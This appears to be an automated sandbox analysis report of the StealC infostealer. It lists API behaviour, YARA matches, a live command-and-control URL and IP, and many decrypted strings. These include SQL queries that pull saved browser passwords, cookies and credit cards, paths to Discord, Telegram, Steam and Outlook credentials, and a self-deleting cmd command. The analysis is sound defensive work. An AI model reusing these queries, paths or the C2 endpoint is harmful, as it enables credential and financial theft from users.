Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00699790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		0_2_00699790
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006998E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,		0_2_006998E0

Source: file.exe, file.exe, 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: &CProgram Manager

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_006C75A8 cpuid

0_2_006C75A8

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00697D20

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00697B10 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,

0_2_00697B10

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_006979E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_006979E0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00697BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_00697BC0

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.680000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2089126694.0000000005020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2132664415.000000000140E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 4024, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.680000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2089126694.0000000005020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2132664415.000000000140E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 4024, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.206	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

Contacted Domains

Name	IP	Active
s-part-0015.t-0009.t-msedge.net	13.107.246.43	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.206/6c4adf523b719729.php	true		unknown
http://185.215.113.206/	true		unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Found malware configuration

Source: 0.2.file.exe.680000.0.unpack

Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.file.exe.680000.0.unpack	String decryptor: INSERT_KEY_HERE
Source: 0.2.file.exe.680000.0.unpack	String decryptor: 30
Source: 0.2.file.exe.680000.0.unpack	String decryptor: 11
Source: 0.2.file.exe.680000.0.unpack	String decryptor: 20
Source: 0.2.file.exe.680000.0.unpack	String decryptor: 24
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetProcAddress
Source: 0.2.file.exe.680000.0.unpack	String decryptor: LoadLibraryA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: lstrcatA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: OpenEventA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: CreateEventA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: CloseHandle
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Sleep
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetUserDefaultLangID
Source: 0.2.file.exe.680000.0.unpack	String decryptor: VirtualAllocExNuma
Source: 0.2.file.exe.680000.0.unpack	String decryptor: VirtualFree
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetSystemInfo
Source: 0.2.file.exe.680000.0.unpack	String decryptor: VirtualAlloc
Source: 0.2.file.exe.680000.0.unpack	String decryptor: HeapAlloc
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetComputerNameA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: lstrcpyA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetProcessHeap
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetCurrentProcess
Source: 0.2.file.exe.680000.0.unpack	String decryptor: lstrlenA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: ExitProcess
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GlobalMemoryStatusEx
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetSystemTime
Source: 0.2.file.exe.680000.0.unpack	String decryptor: SystemTimeToFileTime
Source: 0.2.file.exe.680000.0.unpack	String decryptor: advapi32.dll
Source: 0.2.file.exe.680000.0.unpack	String decryptor: gdi32.dll
Source: 0.2.file.exe.680000.0.unpack	String decryptor: user32.dll
Source: 0.2.file.exe.680000.0.unpack	String decryptor: crypt32.dll
Source: 0.2.file.exe.680000.0.unpack	String decryptor: ntdll.dll
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetUserNameA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: CreateDCA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetDeviceCaps
Source: 0.2.file.exe.680000.0.unpack	String decryptor: ReleaseDC
Source: 0.2.file.exe.680000.0.unpack	String decryptor: CryptStringToBinaryA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: sscanf
Source: 0.2.file.exe.680000.0.unpack	String decryptor: VMwareVMware
Source: 0.2.file.exe.680000.0.unpack	String decryptor: HAL9TH
Source: 0.2.file.exe.680000.0.unpack	String decryptor: JohnDoe
Source: 0.2.file.exe.680000.0.unpack	String decryptor: DISPLAY
Source: 0.2.file.exe.680000.0.unpack	String decryptor: %hu/%hu/%hu
Source: 0.2.file.exe.680000.0.unpack	String decryptor: http://185.215.113.206
Source: 0.2.file.exe.680000.0.unpack	String decryptor: bksvnsj
Source: 0.2.file.exe.680000.0.unpack	String decryptor: /6c4adf523b719729.php
Source: 0.2.file.exe.680000.0.unpack	String decryptor: /746f34465cf17784/
Source: 0.2.file.exe.680000.0.unpack	String decryptor: tale
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetEnvironmentVariableA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetFileAttributesA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GlobalLock
Source: 0.2.file.exe.680000.0.unpack	String decryptor: HeapFree
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetFileSize
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GlobalSize
Source: 0.2.file.exe.680000.0.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 0.2.file.exe.680000.0.unpack	String decryptor: IsWow64Process
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Process32Next
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetLocalTime
Source: 0.2.file.exe.680000.0.unpack	String decryptor: FreeLibrary
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetTimeZoneInformation
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetSystemPowerStatus
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetVolumeInformationA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetWindowsDirectoryA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Process32First
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetLocaleInfoA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetUserDefaultLocaleName
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetModuleFileNameA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: DeleteFileA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: FindNextFileA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: LocalFree
Source: 0.2.file.exe.680000.0.unpack	String decryptor: FindClose
Source: 0.2.file.exe.680000.0.unpack	String decryptor: SetEnvironmentVariableA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: LocalAlloc
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetFileSizeEx
Source: 0.2.file.exe.680000.0.unpack	String decryptor: ReadFile
Source: 0.2.file.exe.680000.0.unpack	String decryptor: SetFilePointer
Source: 0.2.file.exe.680000.0.unpack	String decryptor: WriteFile
Source: 0.2.file.exe.680000.0.unpack	String decryptor: CreateFileA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: FindFirstFileA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: CopyFileA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: VirtualProtect
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetLastError
Source: 0.2.file.exe.680000.0.unpack	String decryptor: lstrcpynA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: MultiByteToWideChar
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GlobalFree
Source: 0.2.file.exe.680000.0.unpack	String decryptor: WideCharToMultiByte
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GlobalAlloc
Source: 0.2.file.exe.680000.0.unpack	String decryptor: OpenProcess
Source: 0.2.file.exe.680000.0.unpack	String decryptor: TerminateProcess
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetCurrentProcessId
Source: 0.2.file.exe.680000.0.unpack	String decryptor: gdiplus.dll
Source: 0.2.file.exe.680000.0.unpack	String decryptor: ole32.dll
Source: 0.2.file.exe.680000.0.unpack	String decryptor: bcrypt.dll
Source: 0.2.file.exe.680000.0.unpack	String decryptor: wininet.dll
Source: 0.2.file.exe.680000.0.unpack	String decryptor: shlwapi.dll
Source: 0.2.file.exe.680000.0.unpack	String decryptor: shell32.dll
Source: 0.2.file.exe.680000.0.unpack	String decryptor: psapi.dll
Source: 0.2.file.exe.680000.0.unpack	String decryptor: rstrtmgr.dll
Source: 0.2.file.exe.680000.0.unpack	String decryptor: CreateCompatibleBitmap
Source: 0.2.file.exe.680000.0.unpack	String decryptor: SelectObject
Source: 0.2.file.exe.680000.0.unpack	String decryptor: BitBlt
Source: 0.2.file.exe.680000.0.unpack	String decryptor: DeleteObject
Source: 0.2.file.exe.680000.0.unpack	String decryptor: CreateCompatibleDC
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GdipGetImageEncodersSize
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GdipGetImageEncoders
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GdiplusStartup
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GdiplusShutdown
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GdipSaveImageToStream
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GdipDisposeImage
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GdipFree
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetHGlobalFromStream
Source: 0.2.file.exe.680000.0.unpack	String decryptor: CreateStreamOnHGlobal
Source: 0.2.file.exe.680000.0.unpack	String decryptor: CoUninitialize
Source: 0.2.file.exe.680000.0.unpack	String decryptor: CoInitialize
Source: 0.2.file.exe.680000.0.unpack	String decryptor: CoCreateInstance
Source: 0.2.file.exe.680000.0.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 0.2.file.exe.680000.0.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 0.2.file.exe.680000.0.unpack	String decryptor: BCryptDecrypt
Source: 0.2.file.exe.680000.0.unpack	String decryptor: BCryptSetProperty
Source: 0.2.file.exe.680000.0.unpack	String decryptor: BCryptDestroyKey
Source: 0.2.file.exe.680000.0.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetWindowRect
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetDesktopWindow
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetDC
Source: 0.2.file.exe.680000.0.unpack	String decryptor: CloseWindow
Source: 0.2.file.exe.680000.0.unpack	String decryptor: wsprintfA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: EnumDisplayDevicesA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetKeyboardLayoutList
Source: 0.2.file.exe.680000.0.unpack	String decryptor: CharToOemW
Source: 0.2.file.exe.680000.0.unpack	String decryptor: wsprintfW
Source: 0.2.file.exe.680000.0.unpack	String decryptor: RegQueryValueExA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: RegEnumKeyExA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: RegOpenKeyExA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: RegCloseKey
Source: 0.2.file.exe.680000.0.unpack	String decryptor: RegEnumValueA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: CryptBinaryToStringA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: CryptUnprotectData
Source: 0.2.file.exe.680000.0.unpack	String decryptor: SHGetFolderPathA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: ShellExecuteExA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: InternetOpenUrlA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: InternetConnectA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: InternetCloseHandle
Source: 0.2.file.exe.680000.0.unpack	String decryptor: InternetOpenA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: HttpSendRequestA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: HttpOpenRequestA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: InternetReadFile
Source: 0.2.file.exe.680000.0.unpack	String decryptor: InternetCrackUrlA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: StrCmpCA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: StrStrA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: StrCmpCW
Source: 0.2.file.exe.680000.0.unpack	String decryptor: PathMatchSpecA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: GetModuleFileNameExA
Source: 0.2.file.exe.680000.0.unpack	String decryptor: RmStartSession
Source: 0.2.file.exe.680000.0.unpack	String decryptor: RmRegisterResources
Source: 0.2.file.exe.680000.0.unpack	String decryptor: RmGetList
Source: 0.2.file.exe.680000.0.unpack	String decryptor: RmEndSession
Source: 0.2.file.exe.680000.0.unpack	String decryptor: sqlite3_open
Source: 0.2.file.exe.680000.0.unpack	String decryptor: sqlite3_prepare_v2
Source: 0.2.file.exe.680000.0.unpack	String decryptor: sqlite3_step
Source: 0.2.file.exe.680000.0.unpack	String decryptor: sqlite3_column_text
Source: 0.2.file.exe.680000.0.unpack	String decryptor: sqlite3_finalize
Source: 0.2.file.exe.680000.0.unpack	String decryptor: sqlite3_close
Source: 0.2.file.exe.680000.0.unpack	String decryptor: sqlite3_column_bytes
Source: 0.2.file.exe.680000.0.unpack	String decryptor: sqlite3_column_blob
Source: 0.2.file.exe.680000.0.unpack	String decryptor: encrypted_key
Source: 0.2.file.exe.680000.0.unpack	String decryptor: PATH
Source: 0.2.file.exe.680000.0.unpack	String decryptor: C:\ProgramData\nss3.dll
Source: 0.2.file.exe.680000.0.unpack	String decryptor: NSS_Init
Source: 0.2.file.exe.680000.0.unpack	String decryptor: NSS_Shutdown
Source: 0.2.file.exe.680000.0.unpack	String decryptor: PK11_GetInternalKeySlot
Source: 0.2.file.exe.680000.0.unpack	String decryptor: PK11_FreeSlot
Source: 0.2.file.exe.680000.0.unpack	String decryptor: PK11_Authenticate
Source: 0.2.file.exe.680000.0.unpack	String decryptor: PK11SDR_Decrypt
Source: 0.2.file.exe.680000.0.unpack	String decryptor: C:\ProgramData\
Source: 0.2.file.exe.680000.0.unpack	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 0.2.file.exe.680000.0.unpack	String decryptor: browser:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: profile:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: url:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: login:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: password:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Opera
Source: 0.2.file.exe.680000.0.unpack	String decryptor: OperaGX
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Network
Source: 0.2.file.exe.680000.0.unpack	String decryptor: cookies
Source: 0.2.file.exe.680000.0.unpack	String decryptor: .txt
Source: 0.2.file.exe.680000.0.unpack	String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 0.2.file.exe.680000.0.unpack	String decryptor: TRUE
Source: 0.2.file.exe.680000.0.unpack	String decryptor: FALSE
Source: 0.2.file.exe.680000.0.unpack	String decryptor: autofill
Source: 0.2.file.exe.680000.0.unpack	String decryptor: SELECT name, value FROM autofill
Source: 0.2.file.exe.680000.0.unpack	String decryptor: history
Source: 0.2.file.exe.680000.0.unpack	String decryptor: SELECT url FROM urls LIMIT 1000
Source: 0.2.file.exe.680000.0.unpack	String decryptor: cc
Source: 0.2.file.exe.680000.0.unpack	String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 0.2.file.exe.680000.0.unpack	String decryptor: name:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: month:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: year:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: card:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Cookies
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Login Data
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Web Data
Source: 0.2.file.exe.680000.0.unpack	String decryptor: History
Source: 0.2.file.exe.680000.0.unpack	String decryptor: logins.json
Source: 0.2.file.exe.680000.0.unpack	String decryptor: formSubmitURL
Source: 0.2.file.exe.680000.0.unpack	String decryptor: usernameField
Source: 0.2.file.exe.680000.0.unpack	String decryptor: encryptedUsername
Source: 0.2.file.exe.680000.0.unpack	String decryptor: encryptedPassword
Source: 0.2.file.exe.680000.0.unpack	String decryptor: guid
Source: 0.2.file.exe.680000.0.unpack	String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 0.2.file.exe.680000.0.unpack	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 0.2.file.exe.680000.0.unpack	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 0.2.file.exe.680000.0.unpack	String decryptor: cookies.sqlite
Source: 0.2.file.exe.680000.0.unpack	String decryptor: formhistory.sqlite
Source: 0.2.file.exe.680000.0.unpack	String decryptor: places.sqlite
Source: 0.2.file.exe.680000.0.unpack	String decryptor: plugins
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Local Extension Settings
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Sync Extension Settings
Source: 0.2.file.exe.680000.0.unpack	String decryptor: IndexedDB
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Opera Stable
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Opera GX Stable
Source: 0.2.file.exe.680000.0.unpack	String decryptor: CURRENT
Source: 0.2.file.exe.680000.0.unpack	String decryptor: chrome-extension_
Source: 0.2.file.exe.680000.0.unpack	String decryptor: _0.indexeddb.leveldb
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Local State
Source: 0.2.file.exe.680000.0.unpack	String decryptor: profiles.ini
Source: 0.2.file.exe.680000.0.unpack	String decryptor: chrome
Source: 0.2.file.exe.680000.0.unpack	String decryptor: opera
Source: 0.2.file.exe.680000.0.unpack	String decryptor: firefox
Source: 0.2.file.exe.680000.0.unpack	String decryptor: wallets
Source: 0.2.file.exe.680000.0.unpack	String decryptor: %08lX%04lX%lu
Source: 0.2.file.exe.680000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 0.2.file.exe.680000.0.unpack	String decryptor: ProductName
Source: 0.2.file.exe.680000.0.unpack	String decryptor: x32
Source: 0.2.file.exe.680000.0.unpack	String decryptor: x64
Source: 0.2.file.exe.680000.0.unpack	String decryptor: %d/%d/%d %d:%d:%d
Source: 0.2.file.exe.680000.0.unpack	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 0.2.file.exe.680000.0.unpack	String decryptor: ProcessorNameString
Source: 0.2.file.exe.680000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 0.2.file.exe.680000.0.unpack	String decryptor: DisplayName
Source: 0.2.file.exe.680000.0.unpack	String decryptor: DisplayVersion
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Network Info:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: - IP: IP?
Source: 0.2.file.exe.680000.0.unpack	String decryptor: - Country: ISO?
Source: 0.2.file.exe.680000.0.unpack	String decryptor: System Summary:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: - HWID:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: - OS:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: - Architecture:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: - UserName:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: - Computer Name:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: - Local Time:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: - UTC:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: - Language:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: - Keyboards:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: - Laptop:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: - Running Path:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: - CPU:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: - Threads:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: - Cores:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: - RAM:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: - Display Resolution:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: - GPU:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: User Agents:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Installed Apps:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: All Users:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Current User:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Process List:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: system_info.txt
Source: 0.2.file.exe.680000.0.unpack	String decryptor: freebl3.dll
Source: 0.2.file.exe.680000.0.unpack	String decryptor: mozglue.dll
Source: 0.2.file.exe.680000.0.unpack	String decryptor: msvcp140.dll
Source: 0.2.file.exe.680000.0.unpack	String decryptor: nss3.dll
Source: 0.2.file.exe.680000.0.unpack	String decryptor: softokn3.dll
Source: 0.2.file.exe.680000.0.unpack	String decryptor: vcruntime140.dll
Source: 0.2.file.exe.680000.0.unpack	String decryptor: \Temp\
Source: 0.2.file.exe.680000.0.unpack	String decryptor: .exe
Source: 0.2.file.exe.680000.0.unpack	String decryptor: runas
Source: 0.2.file.exe.680000.0.unpack	String decryptor: open
Source: 0.2.file.exe.680000.0.unpack	String decryptor: /c start
Source: 0.2.file.exe.680000.0.unpack	String decryptor: %DESKTOP%
Source: 0.2.file.exe.680000.0.unpack	String decryptor: %APPDATA%
Source: 0.2.file.exe.680000.0.unpack	String decryptor: %LOCALAPPDATA%
Source: 0.2.file.exe.680000.0.unpack	String decryptor: %USERPROFILE%
Source: 0.2.file.exe.680000.0.unpack	String decryptor: %DOCUMENTS%
Source: 0.2.file.exe.680000.0.unpack	String decryptor: %PROGRAMFILES%
Source: 0.2.file.exe.680000.0.unpack	String decryptor: %PROGRAMFILES_86%
Source: 0.2.file.exe.680000.0.unpack	String decryptor: %RECENT%
Source: 0.2.file.exe.680000.0.unpack	String decryptor: *.lnk
Source: 0.2.file.exe.680000.0.unpack	String decryptor: files
Source: 0.2.file.exe.680000.0.unpack	String decryptor: \discord\
Source: 0.2.file.exe.680000.0.unpack	String decryptor: \Local Storage\leveldb\CURRENT
Source: 0.2.file.exe.680000.0.unpack	String decryptor: \Local Storage\leveldb
Source: 0.2.file.exe.680000.0.unpack	String decryptor: \Telegram Desktop\
Source: 0.2.file.exe.680000.0.unpack	String decryptor: key_datas
Source: 0.2.file.exe.680000.0.unpack	String decryptor: D877F783D5D3EF8C*
Source: 0.2.file.exe.680000.0.unpack	String decryptor: map*
Source: 0.2.file.exe.680000.0.unpack	String decryptor: A7FDF864FBC10B77*
Source: 0.2.file.exe.680000.0.unpack	String decryptor: A92DAA6EA6F891F2*
Source: 0.2.file.exe.680000.0.unpack	String decryptor: F8806DD0C461824F*
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Telegram
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Tox
Source: 0.2.file.exe.680000.0.unpack	String decryptor: *.tox
Source: 0.2.file.exe.680000.0.unpack	String decryptor: *.ini
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Password
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.680000.0.unpack	String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.680000.0.unpack	String decryptor: 00000001
Source: 0.2.file.exe.680000.0.unpack	String decryptor: 00000002
Source: 0.2.file.exe.680000.0.unpack	String decryptor: 00000003
Source: 0.2.file.exe.680000.0.unpack	String decryptor: 00000004
Source: 0.2.file.exe.680000.0.unpack	String decryptor: \Outlook\accounts.txt
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Pidgin
Source: 0.2.file.exe.680000.0.unpack	String decryptor: \.purple\
Source: 0.2.file.exe.680000.0.unpack	String decryptor: accounts.xml
Source: 0.2.file.exe.680000.0.unpack	String decryptor: dQw4w9WgXcQ
Source: 0.2.file.exe.680000.0.unpack	String decryptor: token:
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Software\Valve\Steam
Source: 0.2.file.exe.680000.0.unpack	String decryptor: SteamPath
Source: 0.2.file.exe.680000.0.unpack	String decryptor: \config\
Source: 0.2.file.exe.680000.0.unpack	String decryptor: ssfn*
Source: 0.2.file.exe.680000.0.unpack	String decryptor: config.vdf
Source: 0.2.file.exe.680000.0.unpack	String decryptor: DialogConfig.vdf
Source: 0.2.file.exe.680000.0.unpack	String decryptor: DialogConfigOverlay*.vdf
Source: 0.2.file.exe.680000.0.unpack	String decryptor: libraryfolders.vdf
Source: 0.2.file.exe.680000.0.unpack	String decryptor: loginusers.vdf
Source: 0.2.file.exe.680000.0.unpack	String decryptor: \Steam\
Source: 0.2.file.exe.680000.0.unpack	String decryptor: sqlite3.dll
Source: 0.2.file.exe.680000.0.unpack	String decryptor: browsers
Source: 0.2.file.exe.680000.0.unpack	String decryptor: done
Source: 0.2.file.exe.680000.0.unpack	String decryptor: soft
Source: 0.2.file.exe.680000.0.unpack	String decryptor: \Discord\tokens.txt
Source: 0.2.file.exe.680000.0.unpack	String decryptor: /c timeout /t 5 & del /f /q "
Source: 0.2.file.exe.680000.0.unpack	String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 0.2.file.exe.680000.0.unpack	String decryptor: C:\Windows\system32\cmd.exe
Source: 0.2.file.exe.680000.0.unpack	String decryptor: https
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 0.2.file.exe.680000.0.unpack	String decryptor: POST
Source: 0.2.file.exe.680000.0.unpack	String decryptor: HTTP/1.1
Source: 0.2.file.exe.680000.0.unpack	String decryptor: Content-Disposition: form-data; name="
